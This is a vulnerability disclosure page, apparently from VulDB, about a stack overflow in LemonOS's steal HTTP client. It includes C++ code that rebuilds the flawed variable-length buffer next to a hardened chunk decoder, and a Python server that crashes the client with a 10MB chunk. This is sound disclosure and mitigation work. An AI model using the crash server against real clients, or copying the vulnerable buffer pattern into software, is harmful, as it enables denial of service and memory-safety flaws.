| Title | LemonOS Lemon OS nightly-2024-07-12 Buffer Overflow |
|---|
| Description |
Description

This vulnerability was identified as a result of collaborative efforts between 0xHamy and 0xVpr: I identified the vulnerability and 0xVpr mitigated it by providing a fix.

This report details a stack overflow vulnerability in the steal HTTP client (the curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the HTTPGet function, specifically at line 361 of main.cpp, where `char recieveBuffer[chunkSize];` is declared.

The chunkSize value is controlled by the external HTTP server's response, allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
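To make the defect and its remedy concrete, the following C++ is an added example written for this page; it is not code from LemonOS's main.cpp and not 0xVpr's fix. The function names, the 1 MiB per-chunk and 64 MiB per-body caps, and the use of an in-memory buffer in place of a socket are all assumptions. `receiveChunkUnsafe` reproduces the reported pattern (a VLA sized by the server-announced chunk size), `decodeChunked` is a hardened reader that validates the hex chunk-size line, rejects oversized chunks before touching any buffer, and copies through a fixed-size stack array, and `makeChunkedBody` builds the same single 10MB chunk the reproduction server below sends so the rejection path can be exercised offline.

```cpp
#include <algorithm>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <iostream>
#include <optional>
#include <string>
#include <string_view>

// Upper bounds chosen for this example (assumptions, not the project's limits).
constexpr size_t kMaxChunkSize = 1u << 20;   // one chunk may not exceed 1 MiB
constexpr size_t kMaxBodySize  = 64u << 20;  // whole decoded body capped at 64 MiB

// The vulnerable pattern from the advisory, reconstructed for contrast: the buffer is
// a VLA whose size is whatever the server announced on the chunk-size line. A large
// value exhausts the stack before a single byte is copied. Only ever called with a
// small size here; never use this shape in real code.
static size_t receiveChunkUnsafe(std::string_view src, size_t chunkSize, std::string& out) {
    char receiveBuffer[chunkSize];  // mirrors `char recieveBuffer[chunkSize];` in the report
    const size_t n = std::min(chunkSize, src.size());
    std::memcpy(receiveBuffer, src.data(), n);
    out.append(receiveBuffer, n);
    return n;
}

// Parse the hex chunk-size field of a chunk header line ("a00000" or "a00000;ext=1").
// Rejects an empty digit run, trailing garbage, and values that would overflow size_t.
static std::optional<size_t> parseChunkSize(std::string_view line) {
    size_t value = 0;
    size_t i = 0;
    for (; i < line.size(); ++i) {
        const char c = line[i];
        int digit;
        if (c >= '0' && c <= '9')      digit = c - '0';
        else if (c >= 'a' && c <= 'f') digit = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') digit = c - 'A' + 10;
        else break;
        if (value > (SIZE_MAX >> 4)) return std::nullopt;  // next shift would overflow
        value = (value << 4) | static_cast<size_t>(digit);
    }
    if (i == 0) return std::nullopt;                             // no hex digits at all
    if (i < line.size() && line[i] != ';') return std::nullopt;  // junk after the size
    return value;
}

enum class ChunkResult { Ok, Malformed, ChunkTooLarge, BodyTooLarge, Truncated };

// Decode a chunked transfer-coding body held in memory (standing in for socket reads).
// The stack buffer has a fixed size; the server-announced chunk size only drives the
// loop count, and it is checked against the caps before any copying happens.
static ChunkResult decodeChunked(std::string_view in, std::string& out) {
    out.clear();
    size_t pos = 0;
    for (;;) {
        const size_t eol = in.find("\r\n", pos);
        if (eol == std::string_view::npos) return ChunkResult::Truncated;
        const std::optional<size_t> size = parseChunkSize(in.substr(pos, eol - pos));
        if (!size) return ChunkResult::Malformed;
        pos = eol + 2;
        if (*size == 0) return ChunkResult::Ok;  // last-chunk; trailers are not handled here
        if (*size > kMaxChunkSize) return ChunkResult::ChunkTooLarge;
        if (out.size() + *size > kMaxBodySize) return ChunkResult::BodyTooLarge;
        if (in.size() - pos < *size + 2) return ChunkResult::Truncated;  // data + CRLF missing

        char piece[4096];  // fixed-size stack buffer, independent of *size
        size_t remaining = *size;
        while (remaining > 0) {
            const size_t n = std::min(remaining, sizeof piece);
            std::memcpy(piece, in.data() + pos, n);
            out.append(piece, n);
            pos += n;
            remaining -= n;
        }
        if (in.substr(pos, 2) != "\r\n") return ChunkResult::Malformed;
        pos += 2;
    }
}

// Build the body the reproduction server sends: one chunk of `chunkSize` bytes of
// `fill`, followed by the last-chunk terminator. Constructed input for this example.
static std::string makeChunkedBody(size_t chunkSize, char fill) {
    std::string body;
    char header[32];
    std::snprintf(header, sizeof header, "%zx\r\n", chunkSize);
    body += header;
    body.append(chunkSize, fill);
    body += "\r\n0\r\n\r\n";
    return body;
}

int main() {
    std::string out;
    const std::string small = makeChunkedBody(5, 'A');
    std::cout << "5-byte chunk -> result " << static_cast<int>(decodeChunked(small, out))
              << ", decoded bytes " << out.size() << "\n";
    // 10MB (0xa00000), as in the PoC: rejected up front instead of sizing a stack array.
    const std::string huge = makeChunkedBody(10485760, 'A');
    std::cout << "10MB chunk   -> result " << static_cast<int>(decodeChunked(huge, out)) << "\n";
    return 0;
}
```

Build with `g++ -std=c++17 -o chunkdemo chunkdemo.cpp` and run it: the 5-byte chunk decodes (result 0, `Ok`) and the 10MB chunk is reported as result 2 (`ChunkTooLarge`) without any allocation proportional to the announced size. The important design choice is that the peer-controlled number is validated and then used only as a loop bound, never as the size of a stack object.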
Reproduce

Download the following two files and put them in the same directory:

https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h

Compile the code:

```sh
g++ -g -o steal main.cpp -lssl -lcrypto
```
Create a Python server that responds with a 10MB chunked body to any incoming request (save it as server.py):

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts between runs
s.bind(('127.0.0.1', 80))  # port 80 requires root privileges
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)  # read (and ignore) the client's request

# One chunk whose declared size is 10MB: steal sizes its stack buffer from this value
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760  # 10MB
payload = b"A" * chunk_size
response += f"{chunk_size:x}\r\n".encode()  # chunk-size line, in hex
response += payload + b"\r\n"
response += b"0\r\n\r\n"  # last-chunk terminator
conn.sendall(response)  # sendall: a bare send() may write only part of a 10MB buffer
conn.close()
s.close()
```
Ensure Python 3 is installed and then run this:

```sh
$ python3 server.py
```

Think of this as a normal server that makes a 10MB installer available to users when they request it.
Send a request to the server with the steal binary:

```sh
./steal "127.0.0.1"
```

This triggers a segmentation fault and crashes the program.

For a more extensive and detailed proof of concept, see the issue I opened on GitHub:

https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation

0xVpr has modified main.cpp and fixed the bug:

https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9

You can now run the same attack again with a chunk_size of 100MB, ten times the amount we used for the initial tests, and steal no longer crashes. |
|---|
| Source | ⚠️ https://hkohi.ca/vulnerability/16 |
|---|
| User | 0xHamy (UID 88518) |
|---|
| Submission | 07/29/2025 20:27 (9 months ago) |
|---|
| Moderation | 08/13/2025 20:54 (15 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 320030 [LemonOS up to nightly-2024-07-12 on LemonOS HTTP Client main.cpp HTTPGet chunkSize stack-based overflow] |
|---|
| Points | 20 |
|---|